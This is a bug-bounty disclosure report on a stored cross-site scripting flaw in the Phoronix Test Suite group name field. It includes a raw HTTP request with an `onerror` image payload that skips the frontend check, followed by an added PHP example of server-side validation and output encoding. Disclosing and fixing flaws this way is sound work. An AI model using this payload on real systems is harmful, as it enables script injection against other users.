huntr  Ktg9  2C0FE81B-0977-4E1E-B5D8-7646C9A7EBBD
Jan 04, 2022 - 1:00 a.m.

Cross-site Scripting (XSS) - Stored in phoronix-test-suite/phoronix-test-suite

2022-01-04 01:00:41
ktg9
www.huntr.dev

EPSS: 0.001 (Low), percentile 43.4%

Description

Hi there, Phoronix Test Suite maintainer team.
There is a stored XSS in the phoronix-test-suite source code. It is in the group name.

Proof of Concept

  1. Install a local instance of phoronix test suite
  2. Create an account and log in, then create a group with name <img src>. Note that you cannot create this in the UI because JavaScript that forbids this is implemented. To do that, you need a tool like Burp Suite to bypass the frontend check and create the system group directly. A request for creating a group with special characters would look like this:

POST /?systems HTTP/1.1
Host: {phoronix}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: {phoronix}
Connection: close
Referer: {phoronix}?systems
Cookie: PHPSESSID=blfirmens92e3129mt1lsjt3m6; pts_websocket_server=ws%3A%2F%2F127.0.1.1%3A8427%2F
Upgrade-Insecure-Requests: 1

new_group=1235<img+src=a+onerror=alert(1)>

  3. After creating the system group, go back to /?systems and see that an alert pops up.

Impact

This vulnerability is capable of stored XSS.
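
The report describes a name check that exists only in frontend JavaScript and a group name that is rendered back on /?systems as markup. The following is an added example, not code from the report or from Phoronix Test Suite, showing the two server-side controls that close that gap: allow-list validation on input and HTML encoding on output. The function names, the 64-character limit and the permitted character set are assumptions made for illustration.

```php
<?php
// Added illustration; not Phoronix Test Suite code. Function names are hypothetical.

// Server-side counterpart of the frontend name check. A proxy can skip the
// JavaScript, so the same rule has to be enforced where the value is stored.
// Assumption: group names only need letters, digits, space, '_', '.' and '-'.
function validate_group_name(string $name): ?string
{
    $name = trim($name);
    if ($name === '' || strlen($name) > 64) {
        return null;
    }
    return preg_match('/\A[A-Za-z0-9 _.\-]+\z/', $name) === 1 ? $name : null;
}

// Output encoding at the point of rendering. It is applied to every stored
// name, including validated ones, so rows saved before the validation existed
// are displayed as text instead of being parsed as HTML.
function render_group_item(string $stored_name): string
{
    $safe = htmlspecialchars($stored_name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<li>' . $safe . '</li>';
}

// Constructed sample input: the form body from the request in step 2,
// decoded the way PHP decodes an application/x-www-form-urlencoded POST.
parse_str('new_group=1235<img+src=a+onerror=alert(1)>', $post);
$submitted = $post['new_group'];

// The reported value fails the allow-list and would not be stored.
var_dump(validate_group_name($submitted));

// An ordinary name passes unchanged.
var_dump(validate_group_name('Build Farm-01'));

// If the reported value is already in storage, encoding turns the angle
// brackets into entities, so the browser shows the tag as literal text.
echo render_group_item($submitted), "\n";
```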
